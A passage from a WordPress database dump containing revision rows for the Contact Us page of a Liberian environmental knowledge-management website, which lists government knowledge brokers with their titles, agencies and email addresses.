10:24:47','2021-01-22 10:24:47','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3382,42,'2021-01-22 10:26:49','2021-01-22 10:26:49','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<strong>Daoda S. Carlon </strong>\n<p>Assistant Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA </br>\ncarlonbaindu@gmail.com		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:26:49','2021-01-22 10:26:49','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3383,42,'2021-01-22 10:26:49','2021-01-22 10:26:49','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<strong>Daoda S. Carlon </strong>\n<p>Assistant Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA </br>\ncarlonbaindu@gmail.com		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:26:49','2021-01-22 10:26:49','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3384,42,'2021-01-22 10:26:49','2021-01-22 10:26:49','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:26:49','2021-01-22 10:26:49','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3385,42,'2021-01-22 10:27:10','2021-01-22 10:27:10','','','','inherit','open','closed','','carlon','','','2021-01-22 10:27:18','2021-01-22 10:27:18','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/carlon.jpg',0,'attachment','image/jpeg',0),(3386,42,'2021-01-22 10:27:32','2021-01-22 10:27:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" 